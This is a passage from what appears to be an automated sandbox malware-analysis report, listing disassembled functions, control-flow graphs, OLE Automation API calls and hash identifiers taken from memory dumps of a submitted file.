                                                          • Source File: 00000000.00000002.1662165312.00000000062B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62b0000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b65f8a4f3077512fad2ac871f7ab773144c560ce012ad5923186d77539a469a2
                                                          • Instruction ID: dbe0e14115e79b6ab184a000accf4205eed3de7be18c4e9e8503589e6395f868
                                                          • Opcode Fuzzy Hash: b65f8a4f3077512fad2ac871f7ab773144c560ce012ad5923186d77539a469a2
                                                          • Instruction Fuzzy Hash: B032A274E01229CFDB64DFA5C880BEDBBB2AF89300F1081AAD549AB354DB345E81CF50
                                                          Function 03390E08 Relevance: .4, Instructions: 432COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 217d7a97218091033636ce12ec71adc21063db5497cb2bc2abd3fdf641d6ba58
                                                          • Instruction ID: 0dc67a7d2202c124f480afd032e4c79dd75336bb215cc9034629148a559b6d0b
                                                          • Opcode Fuzzy Hash: 217d7a97218091033636ce12ec71adc21063db5497cb2bc2abd3fdf641d6ba58
                                                          • Instruction Fuzzy Hash: B1229074E00229CFDB24DF65C994BADBBB6BB88304F1081EAD909A7364DB355E85CF50
                                                          Function 062B26DD Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662165312.00000000062B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62b0000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fef2d28bb510e5869379df328e831ac8cd889bb2e24106d965d853fe8e88edb7
                                                          • Instruction ID: ebfc7b749dd17230b445d908f7f2030ccbd1cd7d2e65ff4b771fec061f1498be
                                                          • Opcode Fuzzy Hash: fef2d28bb510e5869379df328e831ac8cd889bb2e24106d965d853fe8e88edb7
                                                          • Instruction Fuzzy Hash: 0E91C174E012289FDB64DF69C880BDDBBB2BF89300F14C1AAD54DAB254DB345A85CF51
                                                          Function 6CF79357 Relevance: 41.0, APIs: 21, Strings: 1, Instructions: 2492COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF784BF
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF784D2
                                                          • SafeArrayGetElement.OLEAUT32 ref: 6CF7850A
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF794C1
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF794D4
                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CF7950C
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF797A4
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF797B7
                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CF797F2
                                                            • Part of subcall function 6CF73A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF73B71
                                                            • Part of subcall function 6CF73A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF73B83
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF79D5F
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF79D72
                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CF79DAF
                                                            • Part of subcall function 6CF73A90: SafeArrayDestroy.OLEAUT32(?), ref: 6CF73BCF
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF7A1BC
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF7A1CF
                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CF7A20C
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Bound$Destroy$Element
                                                          • String ID: A
                                                          • API String ID: 959723449-3554254475
                                                          • Opcode ID: c790a9be2f4dabcbb8d826be3a237d251c02760bf50d840d963d6f19e045cca6
                                                          • Instruction ID: d661a86cd713d4b9bae917b4785a238929bb699a76bde1344cd2be43f3ccaacb
                                                          • Opcode Fuzzy Hash: c790a9be2f4dabcbb8d826be3a237d251c02760bf50d840d963d6f19e045cca6
                                                          • Instruction Fuzzy Hash: DD23B170A012059FEB10DFA8CD84FDD77F9AF49308F158199EA09AB792DB31E945CB60
                                                          Function 6CF72970 Relevance: 25.8, APIs: 17, Instructions: 335COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1023 6cf72970-6cf729c1 1024 6cf729c3-6cf729c8 call 6cfcc1e0 1023->1024 1025 6cf729cd-6cf729d7 1023->1025 1024->1025 1089 6cf729d8 call 133d149 1025->1089 1090 6cf729d8 call 133d148 1025->1090 1027 6cf729da-6cf729dc 1028 6cf72d12-6cf72d18 1027->1028 1029 6cf729e2-6cf729e8 1027->1029 1030 6cf72d21-6cf72d37 1028->1030 1031 6cf72d1a-6cf72d1b SafeArrayDestroy 1028->1031 1029->1030 1032 6cf729ee-6cf72a1a SafeArrayGetLBound SafeArrayGetUBound 1029->1032 1031->1030 1032->1028 1033 6cf72a20-6cf72a37 SafeArrayGetElement 1032->1033 1033->1028 1034 6cf72a3d-6cf72a4d 1033->1034 1034->1024 1035 6cf72a53-6cf72a6f 1034->1035 1037 6cf72a75-6cf72a77 1035->1037 1038 6cf72d5a-6cf72d5f 1035->1038 1037->1038 1039 6cf72a7d-6cf72a92 call 6cf738e0 1037->1039 1040 6cf72c76-6cf72c78 1038->1040 1045 6cf72c58-6cf72c63 1039->1045 1046 6cf72a98-6cf72aac 1039->1046 1040->1028 1041 6cf72c7e-6cf72c86 1040->1041 1041->1028 1049 6cf72c65-6cf72c6a 1045->1049 1050 6cf72c6d-6cf72c72 1045->1050 1047 6cf72ab6-6cf72acc VariantInit 1046->1047 1048 6cf72aae-6cf72ab3 1046->1048 1047->1024 1051 6cf72ad2-6cf72ae3 1047->1051 1048->1047 1049->1050 1050->1040 1052 6cf72ae5-6cf72ae7 1051->1052 1053 6cf72ae9-6cf72aeb 1051->1053 1054 6cf72aee-6cf72af2 1052->1054 1053->1054 1055 6cf72af4-6cf72af6 1054->1055 1056 6cf72af8 1054->1056 1057 6cf72afa-6cf72b34 1055->1057 1056->1057 1059 6cf72c8b-6cf72caa VariantClear * 2 1057->1059 1060 6cf72b3a-6cf72b50 VariantInit 1057->1060 1059->1050 1061 6cf72cac-6cf72cb4 1059->1061 1060->1024 1062 6cf72b56-6cf72b67 1060->1062 1061->1050 1063 6cf72b6d-6cf72b6f 1062->1063 1064 6cf72b69-6cf72b6b 1062->1064 1066 6cf72b72-6cf72b76 1063->1066 1064->1066 1067 6cf72b7c 1066->1067 1068 6cf72b78-6cf72b7a 1066->1068 1069 6cf72b7e-6cf72bb8 1067->1069 1068->1069 1071 6cf72bbe-6cf72bcb 1069->1071 1072 6cf72d3a-6cf72d55 VariantClear * 3 1069->1072 1071->1072 1073 6cf72bd1-6cf72bf3 call 6cf83160 1071->1073 1072->1045 1077 6cf72cb6-6cf72cf1 VariantClear * 3 1073->1077 1078 6cf72bf9-6cf72c1f VariantClear * 3 1073->1078 1085 6cf72cf3-6cf72cf6 1077->1085 1086 6cf72cfb-6cf72d06 1077->1086 1079 6cf72c21-6cf72c26 1078->1079 1080 6cf72c29-6cf72c34 1078->1080 1079->1080 1081 6cf72c36-6cf72c3b 1080->1081 1082 6cf72c3e-6cf72c4d 1080->1082 1081->1082 1082->1033 1084 6cf72c53 1082->1084 1084->1028 1085->1086 1087 6cf72d10 1086->1087 1088 6cf72d08-6cf72d0d 1086->1088 1087->1028 1088->1087 1089->1027 1090->1027
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF729F6
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF72A08
                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF72A2F
                                                          • VariantInit.OLEAUT32(?), ref: 6CF72ABB
                                                          • VariantInit.OLEAUT32(?), ref: 6CF72B3F
                                                          • VariantClear.OLEAUT32(?), ref: 6CF72C04
                                                          • VariantClear.OLEAUT32(?), ref: 6CF72C0B
                                                          • VariantClear.OLEAUT32(?), ref: 6CF72C12
                                                          • VariantClear.OLEAUT32(?), ref: 6CF72C96
                                                          • VariantClear.OLEAUT32(?), ref: 6CF72C9D
                                                          • VariantClear.OLEAUT32(?), ref: 6CF72CD6
                                                          • VariantClear.OLEAUT32(?), ref: 6CF72CDD
                                                          • VariantClear.OLEAUT32(?), ref: 6CF72CE4
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF72D1B
                                                          • VariantClear.OLEAUT32(?), ref: 6CF72D45
                                                          • VariantClear.OLEAUT32(?), ref: 6CF72D4C
                                                          • VariantClear.OLEAUT32(?), ref: 6CF72D53
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
                                                          • String ID:
                                                          • API String ID: 214056513-0
                                                          • Opcode ID: ea6528a5492f8e1783bbd5bf6c38569388e4554300690e741d27bbb19709e1ba
                                                          • Instruction ID: d82308775e22e9e80b1147a0fdfb58fa1ec3f7fad85d8a60fee94ca2e5b99f20
                                                          • Opcode Fuzzy Hash: ea6528a5492f8e1783bbd5bf6c38569388e4554300690e741d27bbb19709e1ba
                                                          • Instruction Fuzzy Hash: C8C16972608341DFD710CFA8D888A5BBBF9EF89304F20895EF595C7260D672E845CB62
                                                          Function 6CF6AF30 Relevance: 24.3, APIs: 16, Instructions: 335COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1091 6cf6af30-6cf6af95 VariantInit * 3 1092 6cf6af97-6cf6af9c call 6cfcc1e0 1091->1092 1093 6cf6afa1-6cf6afa7 1091->1093 1092->1093 1095 6cf6afb1-6cf6afbf 1093->1095 1096 6cf6afa9-6cf6afae 1093->1096 1170 6cf6afc0 call 133d149 1095->1170 1171 6cf6afc0 call 133d148 1095->1171 1096->1095 1097 6cf6afc2-6cf6afc4 1098 6cf6b22c-6cf6b252 VariantClear * 3 1097->1098 1099 6cf6afca-6cf6afda call 6cf738e0 1097->1099 1100 6cf6b254-6cf6b257 1098->1100 1101 6cf6b25c-6cf6b26a 1098->1101 1099->1098 1106 6cf6afe0-6cf6aff4 1099->1106 1100->1101 1104 6cf6b274-6cf6b288 1101->1104 1105 6cf6b26c-6cf6b271 1101->1105 1105->1104 1107 6cf6aff6-6cf6aff9 1106->1107 1108 6cf6affe-6cf6b015 VariantCopy 1106->1108 1107->1108 1109 6cf6b017-6cf6b018 call 6cfcc1e0 1108->1109 1110 6cf6b01d-6cf6b033 VariantClear 1108->1110 1109->1110 1112 6cf6b035-6cf6b03a call 6cfcc1e0 1110->1112 1113 6cf6b03f-6cf6b050 1110->1113 1112->1113 1115 6cf6b056-6cf6b058 1113->1115 1116 6cf6b052-6cf6b054 1113->1116 1117 6cf6b05b-6cf6b05f 1115->1117 1116->1117 1118 6cf6b065 1117->1118 1119 6cf6b061-6cf6b063 1117->1119 1120 6cf6b067-6cf6b09a 1118->1120 1119->1120 1172 6cf6b09d call 133d149 1120->1172 1173 6cf6b09d call 133d148 1120->1173 1121 6cf6b09f-6cf6b0a1 1121->1098 1122 6cf6b0a7-6cf6b0b3 call 6cfb9bb5 1121->1122 1125 6cf6b0b5-6cf6b0bf 1122->1125 1126 6cf6b0c1 1122->1126 1127 6cf6b0c3-6cf6b0ca 1125->1127 1126->1127 1128 6cf6b0d0-6cf6b0d9 1127->1128 1128->1128 1129 6cf6b0db-6cf6b111 call 6cfb91e1 call 6cfba136 1128->1129 1134 6cf6b113-6cf6b118 call 6cfcc1e0 1129->1134 1135 6cf6b11d-6cf6b12b 1129->1135 1134->1135 1137 6cf6b131-6cf6b133 1135->1137 1138 6cf6b12d-6cf6b12f 1135->1138 1139 6cf6b136-6cf6b13a 1137->1139 1138->1139 1140 6cf6b140 1139->1140 1141 6cf6b13c-6cf6b13e 1139->1141 1142 6cf6b142-6cf6b17e 1140->1142 1141->1142 1144 6cf6b180-6cf6b18a 1142->1144 1145 6cf6b1ff-6cf6b203 1142->1145 1148 6cf6b190-6cf6b1b9 SafeArrayGetLBound SafeArrayGetUBound 1144->1148 1149 6cf6b28d-6cf6b2b8 VariantClear * 3 1144->1149 1146 6cf6b205-6cf6b20e call 6cfb9c35 1145->1146 1147 6cf6b210-6cf6b215 1145->1147 1146->1147 1153 6cf6b217-6cf6b220 call 6cfb9c35 1147->1153 1154 6cf6b223-6cf6b229 call 6cfb9b35 1147->1154 1155 6cf6b1bf-6cf6b1cd SafeArrayAccessData 1148->1155 1156 6cf6b28b 1148->1156 1151 6cf6b2c2-6cf6b2d0 1149->1151 1152 6cf6b2ba-6cf6b2bf 1149->1152 1160 6cf6b2d2-6cf6b2d7 1151->1160 1161 6cf6b2da-6cf6b2ee 1151->1161 1152->1151 1153->1154 1154->1098 1155->1156 1157 6cf6b1d3-6cf6b1f7 call 6cfb91e1 call 6cfba530 SafeArrayUnaccessData 1155->1157 1156->1149 1157->1156 1169 6cf6b1fd 1157->1169 1160->1161 1169->1145 1170->1097 1171->1097 1172->1121 1173->1121
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF6AF75
                                                          • VariantInit.OLEAUT32(?), ref: 6CF6AF7C
                                                          • VariantInit.OLEAUT32(?), ref: 6CF6AF83
                                                          • VariantCopy.OLEAUT32(?,?), ref: 6CF6B00D
                                                          • VariantClear.OLEAUT32(?), ref: 6CF6B027
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF6B19C
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF6B1AA
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 6CF6B1C5
                                                          • _memmove.LIBCMT ref: 6CF6B1E6
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 6CF6B1EF
                                                          • VariantClear.OLEAUT32(?), ref: 6CF6B237
                                                          • VariantClear.OLEAUT32(?), ref: 6CF6B23E
                                                          • VariantClear.OLEAUT32(?), ref: 6CF6B245
                                                          • VariantClear.OLEAUT32(?), ref: 6CF6B29D
                                                          • VariantClear.OLEAUT32(?), ref: 6CF6B2A4
                                                          • VariantClear.OLEAUT32(?), ref: 6CF6B2AB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
                                                          • String ID:
                                                          • API String ID: 3403836469-0
                                                          • Opcode ID: acb10db2833f97af4303ab886d72bc4d23bdbd37f73b2688258a3c746aa7d3bd
                                                          • Instruction ID: 9a0d76f9c44af59115ee97cc8f42a2c08d65aabf5198aa327f468b195eb81029
                                                          • Opcode Fuzzy Hash: acb10db2833f97af4303ab886d72bc4d23bdbd37f73b2688258a3c746aa7d3bd
                                                          • Instruction Fuzzy Hash: 63C179B26083419FD700DF69C884A5BBBF9FB89304F148A6DF659C7650D730E909CBA2
                                                          Function 6CF7D410 Relevance: 24.3, APIs: 16, Instructions: 290COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1174 6cf7d410-6cf7d44c 1175 6cf7d472-6cf7d4e0 VariantInit * 3 1174->1175 1176 6cf7d44e-6cf7d465 1174->1176 1178 6cf7d4e2-6cf7d4ea 1175->1178 1179 6cf7d4ec-6cf7d4f2 1175->1179 1177 6cf7d470 1176->1177 1177->1175 1180 6cf7d4f6-6cf7d504 1178->1180 1179->1180 1181 6cf7d506-6cf7d50d 1180->1181 1182 6cf7d51e-6cf7d527 1180->1182 1183 6cf7d514-6cf7d516 1181->1183 1184 6cf7d50f-6cf7d512 1181->1184 1185 6cf7d529-6cf7d530 1182->1185 1186 6cf7d538-6cf7d53c 1182->1186 1187 6cf7d518-6cf7d51c 1183->1187 1184->1187 1185->1186 1188 6cf7d532-6cf7d536 1185->1188 1189 6cf7d540-6cf7d544 1186->1189 1187->1181 1187->1182 1188->1189 1190 6cf7d704-6cf7d72f VariantClear * 3 1189->1190 1191 6cf7d54a-6cf7d5c0 call 6cfb9d66 SafeArrayCreateVector * 2 SafeArrayAccessData 1189->1191 1192 6cf7d731-6cf7d757 1190->1192 1193 6cf7d76c-6cf7d783 1190->1193 1198 6cf7d5c6-6cf7d5ea call 6cfba530 SafeArrayUnaccessData 1191->1198 1199 6cf7d5c2-6cf7d5c4 1191->1199 1192->1177 1195 6cf7d75d 1192->1195 1201 6cf7d5ec-6cf7d605 SafeArrayPutElement 1198->1201 1199->1201 1203 6cf7d6e5-6cf7d6eb 1201->1203 1204 6cf7d60b-6cf7d629 1201->1204 1207 6cf7d6f6-6cf7d6f8 1203->1207 1208 6cf7d6ed-6cf7d6f3 call 6cfb9d2c 1203->1208 1205 6cf7d633-6cf7d64f SafeArrayPutElement VariantClear 1204->1205 1206 6cf7d62b-6cf7d630 1204->1206 1205->1203 1210 6cf7d655-6cf7d664 1205->1210 1206->1205 1211 6cf7d701 1207->1211 1212 6cf7d6fa-6cf7d6fb SafeArrayDestroy 1207->1212 1208->1207 1214 6cf7d762-6cf7d767 call 6cfcc1e0 1210->1214 1215 6cf7d66a-6cf7d694 1210->1215 1211->1190 1212->1211 1214->1193 1227 6cf7d697 call 133d149 1215->1227 1228 6cf7d697 call 133d148 1215->1228 1217 6cf7d699-6cf7d69b 1217->1203 1218 6cf7d69d-6cf7d6a9 1217->1218 1218->1203 1219 6cf7d6ab-6cf7d6c1 call 6cf6db30 1218->1219 1219->1203 1222 6cf7d6c3-6cf7d6e0 call 6cf756b0 call 6cf76880 1219->1222 1222->1203 1227->1217 1228->1217
                                                          APIs
                                                          • VariantInit.OLEAUT32 ref: 6CF7D4B3
                                                          • VariantInit.OLEAUT32 ref: 6CF7D4C5
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7D4CC
                                                          • _malloc.LIBCMT ref: 6CF7D551
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF7D58B
                                                          • SafeArrayCreateVector.OLEAUT32 ref: 6CF7D5A6
                                                          • SafeArrayAccessData.OLEAUT32 ref: 6CF7D5B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
                                                          • String ID:
                                                          • API String ID: 1552365394-0
                                                          • Opcode ID: 0c5b7b393515d814a2f9854ad182e69c1b17607cf7c87c404b251c341b432c6c
                                                          • Instruction ID: 1c549b70aa692457312c8c742eac189a839e88fa84c19bea6bac60a5aef70894
                                                          • Opcode Fuzzy Hash: 0c5b7b393515d814a2f9854ad182e69c1b17607cf7c87c404b251c341b432c6c
                                                          • Instruction Fuzzy Hash: 5FB147766083019FD314CF28C880A5BBBF9FF89318F54895EE89597750E731E905CBA2
                                                          Function 6CF7D468 Relevance: 21.2, APIs: 14, Instructions: 226COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1229 6cf7d468 1230 6cf7d470-6cf7d4e0 VariantInit * 3 1229->1230 1232 6cf7d4e2-6cf7d4ea 1230->1232 1233 6cf7d4ec-6cf7d4f2 1230->1233 1234 6cf7d4f6-6cf7d504 1232->1234 1233->1234 1235 6cf7d506-6cf7d50d 1234->1235 1236 6cf7d51e-6cf7d527 1234->1236 1237 6cf7d514-6cf7d516 1235->1237 1238 6cf7d50f-6cf7d512 1235->1238 1239 6cf7d529-6cf7d530 1236->1239 1240 6cf7d538-6cf7d53c 1236->1240 1241 6cf7d518-6cf7d51c 1237->1241 1238->1241 1239->1240 1242 6cf7d532-6cf7d536 1239->1242 1243 6cf7d540-6cf7d544 1240->1243 1241->1235 1241->1236 1242->1243 1244 6cf7d704-6cf7d72f VariantClear * 3 1243->1244 1245 6cf7d54a-6cf7d5c0 call 6cfb9d66 SafeArrayCreateVector * 2 SafeArrayAccessData 1243->1245 1246 6cf7d731-6cf7d757 1244->1246 1247 6cf7d76c-6cf7d783 1244->1247 1252 6cf7d5c6-6cf7d5ea call 6cfba530 SafeArrayUnaccessData 1245->1252 1253 6cf7d5c2-6cf7d5c4 1245->1253 1246->1230 1249 6cf7d75d 1246->1249 1255 6cf7d5ec-6cf7d605 SafeArrayPutElement 1252->1255 1253->1255 1257 6cf7d6e5-6cf7d6eb 1255->1257 1258 6cf7d60b-6cf7d629 1255->1258 1261 6cf7d6f6-6cf7d6f8 1257->1261 1262 6cf7d6ed-6cf7d6f3 call 6cfb9d2c 1257->1262 1259 6cf7d633-6cf7d64f SafeArrayPutElement VariantClear 1258->1259 1260 6cf7d62b-6cf7d630 1258->1260 1259->1257 1264 6cf7d655-6cf7d664 1259->1264 1260->1259 1265 6cf7d701 1261->1265 1266 6cf7d6fa-6cf7d6fb SafeArrayDestroy 1261->1266 1262->1261 1268 6cf7d762-6cf7d767 call 6cfcc1e0 1264->1268 1269 6cf7d66a-6cf7d694 1264->1269 1265->1244 1266->1265 1268->1247 1281 6cf7d697 call 133d149 1269->1281 1282 6cf7d697 call 133d148 1269->1282 1271 6cf7d699-6cf7d69b 1271->1257 1272 6cf7d69d-6cf7d6a9 1271->1272 1272->1257 1273 6cf7d6ab-6cf7d6c1 call 6cf6db30 1272->1273 1273->1257 1276 6cf7d6c3-6cf7d6e0 call 6cf756b0 call 6cf76880 1273->1276 1276->1257 1281->1271 1282->1271
                                                          APIs
                                                          • VariantInit.OLEAUT32 ref: 6CF7D4B3
                                                          • VariantInit.OLEAUT32 ref: 6CF7D4C5
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7D4CC
                                                          • _malloc.LIBCMT ref: 6CF7D551
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF7D58B
                                                          • SafeArrayCreateVector.OLEAUT32 ref: 6CF7D5A6
                                                          • SafeArrayAccessData.OLEAUT32 ref: 6CF7D5B8
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF7D601
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF7D63E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
